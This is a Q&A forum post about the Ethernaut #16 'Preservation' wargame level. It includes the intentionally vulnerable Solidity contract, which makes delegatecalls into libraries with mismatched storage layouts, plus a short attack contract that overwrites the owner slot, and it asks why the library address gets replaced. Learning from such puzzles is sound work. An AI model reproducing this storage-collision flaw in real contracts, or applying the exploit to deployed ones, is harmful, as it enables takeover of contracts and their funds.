# How can timeZone1Library value be changed to address of Attack code? (Ethernaut #16 Preservation)

Tags: delegatecall

I've been practicing Ethernaut #16 Preservation. Everything is okay and I understood what delegatecall is. But, I don't get why `timeZone1Library`  can be changed when we pass deployed attack address as `setFirstTime`'s parameter. I referred to [D-Squared video](https://youtu.be/vZKYNNgUM68?t=1371).

**Edit** : I added source code of problem and attack code. Sorry I didn't know that linking video is not helpful. He deployed Attack code and called `setFirstTime` with deployed Atrack contract address. And when he typed `await web3.eth.getStorageAt(contract.address, 0, console.log)` in console, `timeZone1Library` value got changed to address of Attack code.

1. Problem code

```js
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Preservation {

  // public library contracts 
  address public timeZone1Library;
  address public timeZone2Library;
  address public owner; 
  uint storedTime;
  // Sets the function signature for delegatecall
  bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

  constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) public {
    timeZone1Library = _timeZone1LibraryAddress; 
    timeZone2Library = _timeZone2LibraryAddress; 
    owner = msg.sender;
  }
 
  // set the time for timezone 1
  function setFirstTime(uint _timeStamp) public {
    timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }

  // set the time for timezone 2
  function setSecondTime(uint _timeStamp) public {
    timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }
}

// Simple library contract to set the time
contract LibraryContract {

  // stores a timestamp 
  uint storedTime;  

  function setTime(uint _time) public {
    storedTime = _time;
  }
}
```

2. Attack code

```js
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Preservation {

    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;

    function setTime(address _owner) public {
        owner = _owner;
    }

}
```

Comment: Could you add a bit more of the relevant code? Would be very helpful to answer, It's difficult for folks to answer if they need to watch a video

Comment: I added some codes. Thank you :)